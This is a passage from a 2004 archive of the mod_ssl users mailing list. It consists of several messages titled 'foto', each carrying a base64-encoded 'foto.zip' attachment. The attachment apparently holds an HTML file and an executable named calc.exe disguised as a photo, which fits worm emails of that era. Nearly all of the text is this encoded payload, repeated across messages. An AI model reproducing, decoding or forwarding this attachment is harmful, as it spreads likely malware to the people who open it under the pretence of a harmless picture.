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
UEsFBgAAAAADAAMAngAAABoRAAAAAA==

----------lwpkogyxgkcqeoxlubkg--


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Sep  1 01:09:11 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 7BA7DA8A7F; Wed,  1 Sep 2004 01:09:11 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from andy.org (pa-bethelparkcadent1shills1c-27.pit.adelphia.net [24.54.135.27])
	by master.modssl.org (Postfix) with SMTP id 9009FA8A65
	for ; Wed,  1 Sep 2004 01:09:05 +0200 (CEST)
Date: Tue, 31 Aug 2004 19:04:49 -0500
To: "Modssl-users" 
From: "Rse" 
Subject: foto
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------dwhuwsnevklkwiwjdkuu"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------dwhuwsnevklkwiwjdkuu
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit


foto







----------dwhuwsnevklkwiwjdkuu
Content-Type: application/octet-stream; name="foto.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="foto.zip"

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
UEsFBgAAAAADAAMAngAAABoRAAAAAA==

----------dwhuwsnevklkwiwjdkuu--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Sep  1 01:16:02 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 37587A8A79; Wed,  1 Sep 2004 01:16:02 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from moses.net (207-224-200-166.slkc.qwest.net [207.224.200.166])
	by master.modssl.org (Postfix) with SMTP id 2CC87A8982
	for ; Wed,  1 Sep 2004 01:15:56 +0200 (CEST)
Date: Tue, 31 Aug 2004 17:14:17 -0700
To: "Modssl-users" 
From: "Rse" 
Subject: foto
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------wgzwuoouobziioiwhtgs"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------wgzwuoouobziioiwhtgs
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit


foto







----------wgzwuoouobziioiwhtgs
Content-Type: application/octet-stream; name="foto.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="foto.zip"

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
